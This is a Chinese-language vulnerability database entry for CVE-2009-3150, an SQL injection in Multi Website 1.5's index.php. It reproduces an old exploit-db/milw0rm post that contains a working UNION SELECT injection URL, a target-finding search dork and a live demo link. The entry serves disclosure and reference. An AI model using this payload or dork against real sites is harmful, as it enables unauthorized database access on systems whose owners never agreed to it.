Multi Website SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118231 漏洞类型 SQL注入
发布时间 2009-08-03 更新时间 2009-08-05
CVE编号 CVE-2009-3150 CNNVD-ID CNNVD-200909-203
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9344
https://www.securityfocus.com/bid/43243
https://cxsecurity.com/issue/WLB-2009090128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200909-203
|漏洞详情
MultiWebsite1.5版本的index.php中存在SQL注入漏洞。远程攻击者可以借助一个投票操作中的一个刷新参数,执行任意SQL指令。
|漏洞EXP
> > [+] Bug : Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability
> >
> > [+] Script home : http://www.multi-website.com
> >
> > [+] Affected versions : 1.5
> >
> > [+] Solution : nothing .;
> > > >
> > > > =======================================================
> > > >
> > > > ==> AuThOr : SarboT511
> > > >
> > > > ==> EmaiL : xs3@hotmail.com
> > > >
> > > > ==> HomE : www.lezr.com
> > > >
> > > > ==> DorK : Powered by Multi Website 1.5
> > > >
> > > > ==> Control panel script : http://localhost/[path]/admin/login.php
> > > >
> > > > ========================================================
> > > >
> > > > ==> ExplO!t :
> > > >
> > > > www.target.com/[path]/?action=vote&Browse=-1+union+select+1,@@version--
> > > >=========================================================
> > > > L!VE Demo :
> > > >
> > >  http://www.multi-website.com/demo/?action=vote&Browse=-1+union+select+1,@@version--
> > =============================================================
> > greats to : his0k4 , The g0bL!n , black zero , thirdd_Devil ,devil
> > fucker ,3loosh_al7rbi ,HCj , ALM 511 , all members [ lezr.com ] .#

# milw0rm.com [2009-08-03]
|受影响的产品
OUONGROUP Multi Website 1.5
|参考资料

来源:VUPEN
名称:ADV-2009-2132
链接:http://www.vupen.com/english/advisories/2009/2132
来源:MILW0RM
名称:9344
链接:http://www.milw0rm.com/exploits/9344
来源:SECUNIA
名称:36107
链接:http://secunia.com/advisories/36107